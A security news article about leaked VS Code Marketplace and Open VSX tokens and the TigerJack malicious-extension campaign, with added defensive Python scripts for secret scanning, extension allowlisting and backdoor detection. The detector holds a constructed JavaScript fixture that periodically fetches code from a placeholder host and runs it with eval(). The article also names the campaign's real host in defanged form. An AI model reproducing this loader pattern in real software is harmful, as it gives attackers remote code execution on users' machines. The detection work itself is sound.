Over 100 VS Code extensions expose developers to hidden supply chain risks

By user, October 15, 2025

A new study has found that more than 100 Visual Studio Code (VS Code) extension publishers have leaked access tokens that malicious actors could use to push updates to those publishers' extensions, posing a significant risk to the software supply chain.

“A leaked VSCode Marketplace or Open VSX PAT [personal access token] means an attacker could distribute updates to a malicious extension directly to the entire installed base,” Wiz security researcher Rami McCarthy said in a report shared with The Hacker News. “An attacker who discovered this issue would have been able to directly distribute malware to a cumulative installed base of 150,000.”

The cloud security firm noted that publishers often overlook the fact that a VS Code extension is distributed as a .vsix file, which is simply a ZIP archive: anything bundled into it, including hard-coded secrets, is visible to anyone who unzips and inspects it.

In total, Wiz found over 550 verified secrets across more than 500 extensions from hundreds of different publishers. The 550 secrets fall into 67 different types, including:

  • AI provider secrets (OpenAI, Gemini, Anthropic, XAI, DeepSeek, Hugging Face, Perplexity, etc.)
  • Cloud service provider secrets (Amazon Web Services (AWS), Google Cloud, GitHub, Stripe, Auth0, etc.)
  • Database secrets (MongoDB, PostgreSQL, Supabase, etc.)
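The check a publisher (or a cautious user) can run before shipping or installing is the one the paragraph above describes: treat the .vsix as the ZIP it is, walk its members and look for credential-shaped strings. The script below is an added example, not Wiz's scanner or code from the article; the regexes are illustrative shapes for a handful of the secret types listed (assumed, not Wiz's rule set), the entropy threshold is an assumed cut-off for dropping placeholders, and the .vsix it scans is constructed in memory with fake credentials.

```python
"""Unzip a .vsix and scan its contents for hard-coded secrets.

Added example, not Wiz's tooling or code from the article: the regexes are
illustrative token shapes (assumed, not Wiz's rule set), and the sample .vsix
is constructed in memory with fake credentials.
"""
import io
import math
import re
import zipfile

# Illustrative patterns for a few well-known token formats (assumption: these
# shapes are representative; a real scanner would carry many more).
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "openai_api_key": re.compile(r"\bsk-[A-Za-z0-9]{20,}\b"),
    "mongodb_uri": re.compile(r"mongodb(?:\+srv)?://[^\s'\"]+:[^\s'\"]+@[^\s'\"]+"),
}
# Generic fallback: a credential-like name assigned a long string value.
GENERIC = re.compile(
    r"(?i)(api[_-]?key|token|secret|password)[\"']?\s*[:=]\s*[\"']([A-Za-z0-9_\-/+=]{24,})[\"']"
)
SCAN_SUFFIXES = (".js", ".ts", ".json", ".env", ".txt", ".map")
ENTROPY_THRESHOLD = 3.5  # bits per character (assumed cut-off); placeholders score well below


def shannon_entropy(s):
    """Bits of entropy per character; used to drop obvious placeholders."""
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def scan_text(text):
    """Return (secret_type, value) pairs found in one file's text."""
    hits, seen = [], set()
    for kind, rx in PATTERNS.items():
        for m in rx.finditer(text):
            hits.append((kind, m.group(0)))
            seen.add(m.group(0))
    for m in GENERIC.finditer(text):
        value = m.group(2)
        # Skip values already reported by a specific pattern and low-entropy placeholders.
        if value not in seen and shannon_entropy(value) > ENTROPY_THRESHOLD:
            hits.append(("generic_high_entropy", value))
    return hits


def scan_vsix(data):
    """A .vsix is a ZIP archive: walk every text-like member and scan it."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(SCAN_SUFFIXES):
                continue
            text = zf.read(info).decode("utf-8", errors="replace")
            for kind, value in scan_text(text):
                # Never print the full secret; a short prefix is enough to triage.
                findings.append({"file": info.filename, "type": kind, "preview": value[:6] + "..."})
    return findings


def build_sample_vsix():
    """Constructed sample .vsix with fake credentials (not real secrets)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("extension.vsixmanifest", "<PackageManifest/>")
        zf.writestr(
            "extension/package.json",
            '{"name": "demo-theme", "publisher": "example", "apiKey": "REPLACE_ME_REPLACE_ME_REPLACE_ME"}',
        )
        zf.writestr(
            "extension/out/extension.js",
            'const aws = "AKIAIOSFODNN7EXAMPLE";\n'
            'const gh = "ghp_A1b2C3d4E5f6G7h8I9j0K1l2M3n4O5p6Q7r8";\n'
            'process.env.OPENAI_API_KEY = "sk-abcdefghijklmnopqrstuvwxyz0123456789";\n',
        )
        zf.writestr("extension/.env", "DB_PASSWORD='Qm9vay1SZWFkZXItMjAyNS1zZWNyZXQ='\n")
        zf.writestr("extension/themes/dark.json", '{"colors": {"editor.background": "#1e1e1e"}}')
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_vsix(build_sample_vsix()):
        print(f"{f['file']}: {f['type']} ({f['preview']})")
```

Two design points matter in practice: the generic pattern is what catches the long tail of the 67 secret types, so it needs the entropy filter to avoid drowning in `REPLACE_ME` placeholders, and the report shows only a prefix so the scan log itself does not become a second leak.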

Wiz also noted in the report that over 100 extensions had leaked VS Code Marketplace PATs, accounting for over 85,000 installs, and that a further 30 extensions, with a cumulative installed base of over 100,000, had leaked Open VSX access tokens. The majority of the flagged extensions are themes.


Because Open VSX is also the registry used by artificial intelligence (AI)-powered forks of VS Code such as Cursor and Windsurf, an extension that leaks an Open VSX token puts those users in reach as well, significantly expanding the attack surface.

As an example, the company said it had identified a VS Code Marketplace PAT that could have been used to push targeted malware to employees of a $30 billion Chinese company, showing that the issue also extends to internal and vendor-specific extensions used by organizations.

Following Wiz's responsible disclosures to Microsoft in late March and April 2025, the Windows maker said it had revoked the leaked PATs, blocked extensions with verified secrets, and added a secret scanning feature that notifies developers when a secret is detected.

The researchers recommend that VS Code users limit the number of extensions they install, vet extensions before installing them, and weigh the pros and cons of enabling automatic updates, since an automatic update is exactly the path by which a hijacked publisher token turns into code running on every installed machine. For organizations, they recommend keeping an extension inventory and considering a central allowlist, so that reports of malicious extensions can be acted on quickly.
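The inventory-plus-allowlist recommendation above is straightforward to put into practice. The script below is an added example, not from Wiz or the article: it parses the output of the real VS Code CLI invocation `code --list-extensions --show-versions` (one `publisher.name@version` per line), compares it against an allowlist that can pin exact versions, and reports what is not allowed or has drifted from the pinned version. The allowlist and the sample CLI output are constructed for the demo.

```python
"""Build a VS Code extension inventory and check it against an allowlist.

Added example, not from the article or Wiz. The inventory format is the
output of `code --list-extensions --show-versions` (real VS Code CLI flags),
which prints one `publisher.name@version` per line. The allowlist and the
sample listing below are constructed for the demo.
"""
import subprocess

# Constructed allowlist: key is publisher.name (lowercase); value is "*" for
# any version or an exact version string to pin a vetted build.
ALLOWLIST = {
    "ms-python.python": "*",
    "esbenp.prettier-vscode": "3.0.0",
    "dbaeumer.vscode-eslint": "*",
}

# Constructed sample of `code --list-extensions --show-versions` output.
SAMPLE_LISTING = """\
ms-python.python@2025.4.0
esbenp.prettier-vscode@3.1.0
dbaeumer.vscode-eslint@3.0.10
some-publisher.cpp-playground@1.0.3
"""


def parse_listing(text):
    """Map 'publisher.name' -> version from the CLI's line-per-extension output."""
    inventory = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or "@" not in line:
            continue
        ident, _, version = line.rpartition("@")
        inventory[ident.lower()] = version
    return inventory


def check_inventory(inventory, allowlist):
    """Classify every installed extension as allowed, version-drifted, or not allowed."""
    report = {"allowed": [], "version_drift": [], "not_allowed": []}
    for ident, version in sorted(inventory.items()):
        policy = allowlist.get(ident)
        if policy is None:
            report["not_allowed"].append(ident)
        elif policy != "*" and policy != version:
            # Installed build differs from the vetted one: an update went in unreviewed.
            report["version_drift"].append((ident, version, policy))
        else:
            report["allowed"].append(ident)
    return report


def live_listing(code_cmd="code"):
    """Run the real CLI on this machine (used only when invoked directly)."""
    out = subprocess.run(
        [code_cmd, "--list-extensions", "--show-versions"],
        capture_output=True, text=True, check=True,
    )
    return out.stdout


if __name__ == "__main__":
    report = check_inventory(parse_listing(SAMPLE_LISTING), ALLOWLIST)
    for bucket, items in report.items():
        print(f"{bucket}: {items}")
```

Run across a fleet (each developer machine contributing its `live_listing()` output), the `not_allowed` bucket is the list to chase when a marketplace takedown like the one described above is announced, and the `version_drift` bucket shows where automatic updates have quietly replaced a version someone actually reviewed. Pairing the allowlist with `"extensions.autoUpdate": false` in settings turns updates into a deliberate step rather than a silent one.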

“This issue highlights the continuing risks of extensions and plugins, and supply chain security in general,” Wiz said. “We continue to validate the impression that any package repository carries a high risk of mass security exposure.”

TigerJack targets VS Code marketplace with malicious extension

The development comes after Koi Security revealed details of a threat actor codenamed TigerJack who allegedly published at least 11 legitimate-looking malicious VS Code extensions using various publisher accounts since early 2025 as part of a “coordinated and systematic” campaign.

“Tigerjack, operating under the identities ab-498, 498, and 498-00, deployed a sophisticated arsenal of extensions that stole source code, mined cryptocurrencies, and established remote backdoors for complete system control,” said security researcher Tuval Admoni.

Two of the malicious extensions (C++ Playground and HTTP Format) garnered over 17,000 downloads before being removed. However, they remain available in Open VSX, and after the removal the threat actor republished the same malicious code under a new name on the VS Code Marketplace on September 17, 2025.

What makes these extensions notable is that they deliver the promised functionality, which gives them cover: unsuspecting developers who install them have no reason to notice the malicious activity.

Specifically, the C++ Playground extension was found to capture keystrokes in near real time through a listener that fires after a 500ms delay, with the ultimate goal of stealing C++ source code files. The HTTP Format extension, for its part, hides code that runs the CoinIMP miner, abusing the machine's resources to mine cryptocurrency covertly.

Three other extensions published by TigerJack under the alias ‘498’, namely cppplayground, httpformat and pythonformat, go further by incorporating backdoor functionality: every 20 minutes they download and execute arbitrary JavaScript from an external server (“ab498.pythonanywhere[.]com”).


“By checking for new instructions every 20 minutes and using eval() on remotely retrieved code, TigerJack can dynamically push malicious payloads without updating the extension. It can steal credentials or API keys, deploy ransomware, use compromised developer machines as entry points into corporate networks, inject backdoors into projects, and monitor activity in real time,” Admoni said.
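The combination described in the two paragraphs above (a periodic timer, a request to an external host, and `eval()` of whatever comes back) is a pattern that can be flagged statically in an extension's JavaScript before it is trusted. The checker below is an added example, not Koi Security's detection logic or code from the campaign: its regexes are simple heuristics (assumed, not a published signature set), and the two JavaScript snippets it analyses are constructed to mimic the behaviour the article describes (the 20-minute poll to a placeholder host on the reserved `.invalid` domain) and a benign timer that does no remote evaluation.

```python
"""Flag extension JavaScript that polls a remote server and eval()s the response.

Added example, not Koi Security's detection logic. The heuristics are plain
regexes over source text (assumed, not a published signature set); the two
samples are constructed, and the host in the malicious one is a placeholder.
"""
import re

REMOTE_FETCH = re.compile(r"\b(fetch|https?\.get|https?\.request|axios\.(get|post)|XMLHttpRequest)\b")
DYNAMIC_EVAL = re.compile(r"\b(eval|new\s+Function|vm\.runInThisContext|vm\.runInNewContext)\s*\(")
# setInterval(callback, <numeric product>): capture the period expression.
TIMER = re.compile(r"\bsetInterval\s*\([^;]*?,\s*([0-9_*\s]+)\)")
HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")

# Constructed sample mimicking the described backdoor: fetch every 20 minutes, eval() the body.
MALICIOUS_SAMPLE = """
const https = require("https");
function poll() {
  https.get("https://c2.example.invalid/payload.js", (res) => {
    let body = "";
    res.on("data", (d) => body += d);
    res.on("end", () => { eval(body); });
  });
}
setInterval(poll, 20 * 60 * 1000);
"""

# Constructed benign sample: a timer that only refreshes a status bar clock.
BENIGN_SAMPLE = """
const vscode = require("vscode");
const item = vscode.window.createStatusBarItem();
function refreshClock() { item.text = new Date().toLocaleTimeString(); }
setInterval(refreshClock, 1000);
"""


def interval_ms(expr):
    """Evaluate a product of integer literals like '20 * 60 * 1000' without using eval()."""
    total = 1
    for part in expr.split("*"):
        total *= int(part.strip().replace("_", ""))
    return total


def analyze_source(src):
    """Score one JavaScript source for the remote-code-loader pattern."""
    hosts = sorted(set(HOST.findall(src)))
    intervals = [interval_ms(m.group(1)) for m in TIMER.finditer(src)]
    indicators = {
        "remote_fetch": bool(REMOTE_FETCH.search(src)),
        "dynamic_eval": bool(DYNAMIC_EVAL.search(src)),
        "periodic_timer": bool(intervals),
    }
    if all(indicators.values()):
        verdict = "remote_code_loader"   # fetch + eval + timer: the backdoor shape
    elif indicators["dynamic_eval"]:
        verdict = "review"               # eval() alone deserves a human look
    else:
        verdict = "clean"
    return {
        "indicators": indicators,
        "hosts": hosts,
        "interval_minutes": [ms / 60000 for ms in intervals],
        "verdict": verdict,
    }


if __name__ == "__main__":
    for name, src in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, analyze_source(src))
```

The point of separating the three indicators is that none is suspicious on its own (status bars use timers, many extensions fetch, and bundlers occasionally emit `new Function`); it is the conjunction, with the period and the contacted hosts reported alongside, that gives a reviewer something concrete to act on. Obfuscated or minified code will defeat these regexes, which is why the article's sandboxed runtime scanning complements static checks rather than replacing them.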

Koi Security also pointed out that most of these extensions started out as completely benign tools before any malicious changes were introduced, a classic Trojan horse approach. This benefits the threat actor in several ways, since it establishes legitimacy and builds a user base first.

Threat actors can then push a malicious update later and compromise the environment, fooling developers who vetted the extension before installing it.

In June 2025, Microsoft announced that it was implementing a multi-step process to protect the VS Code marketplace from malware. This includes an initial scan of all incoming packages for malicious runtime behavior in a sandbox environment, as well as rescans and regular market-wide scans to “ensure everything is safe.”

That said, these security protections apply only to the VS Code Marketplace and not to others, such as the Open VSX Registry. This means that even if a malicious extension is removed from Microsoft’s platform, attackers can easily migrate to less secure alternatives.

“The fragmented security landscape across all markets has created dangerous blind spots that sophisticated attackers are already exploiting,” the company said. “When security operates in silos, threats simply move between platforms without developers even realizing it.”

